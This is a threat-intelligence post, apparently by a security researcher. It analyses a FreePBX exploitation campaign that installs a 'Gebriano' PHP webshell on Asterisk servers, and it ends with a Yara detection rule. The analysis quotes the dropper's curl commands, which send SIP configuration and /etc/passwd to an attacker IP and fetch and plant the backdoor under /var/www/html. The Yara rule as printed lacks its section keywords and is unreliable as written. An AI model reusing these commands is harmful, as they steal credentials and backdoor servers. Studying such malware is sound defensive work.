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Created September 22, 2021 18:43
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Yara rule for Gebriano webshell, affects Asterix servers

Found a request in my HTTP honeypot I couldn't explain. Investigation revealed it's been scanning widely and attempting to exploit a FreePBX command injection vulnerability and install a webshell. - - [21/Sep/2021:18:54:34 -0400] "GET /gbr.php HTTP/1.1" 400 226 "-" "gbrmss/7.29.0" "ct:text/html"

Using this IP I spotted this link which showed me the form data:

Based on the request there this appears to be an RCE injected via the "language" header. Exploit here:

From there I investigated the initial dropper:


It's about 900 bytes long, but it has a variable hash - the client IP is included in the payload for future requests.

The script will POST the Asterisk server config to the host:

curl  -d "`cat /etc/asterisk/sip*`" "http://77[.]247.108.42/g/?d=sipConfs&i=${stIp}"

(where the variable stIp is the server's IP address, populated in the script earlier) and then attempt to upload the password file, too:

curl  -d "`cat /etc/passwd`" "http://77[.]247.108.42/g/?d=etc_passwd&i=${stIp}"

The script will also download a PHP script from the server and install it as "config.php" under all web directories (after finding all writable directories under /var/www/html).

shellContent=`curl -s "77[.]247.108.42/g/?f=phFrPb&i=${stIp}"`

It will also create a new directory for this PHP backdoor and put it under "index.php":

mkdir -p /var/www/html/cnfg 2>/dev/null
echo "$shellContent" > /var/www/html/cnfg/index.php 2>/dev/null

A Yara rule is enclosed, too, to detect the webshell (TLP:GREEN).

Happy hunting.

rule gebriano_webshell {
author = "Jose Nazario"
date = "9/22/2021"
description = "Gebriano webshell, affects Asterix servers; start here and look at URL injected. The hashes vary because it includes the IP of the server, so that's not used."
$s0 = "$_SESSION['Gebriano'] = 'logged';"
$s1 = "echo '<input type=\"submit\" name=\"Gebriano\" value=\"Gebriano\" /> ';"
$s2 = "if (isset($_REQUEST['admin']) && $_REQUEST['admin'] == 'Elastix')"
$s3 = "<h1 style=\"text-align: center;\">GEBRIANO</h1>"
$s4 = "# add softphone to shelland web proxy"
all of them
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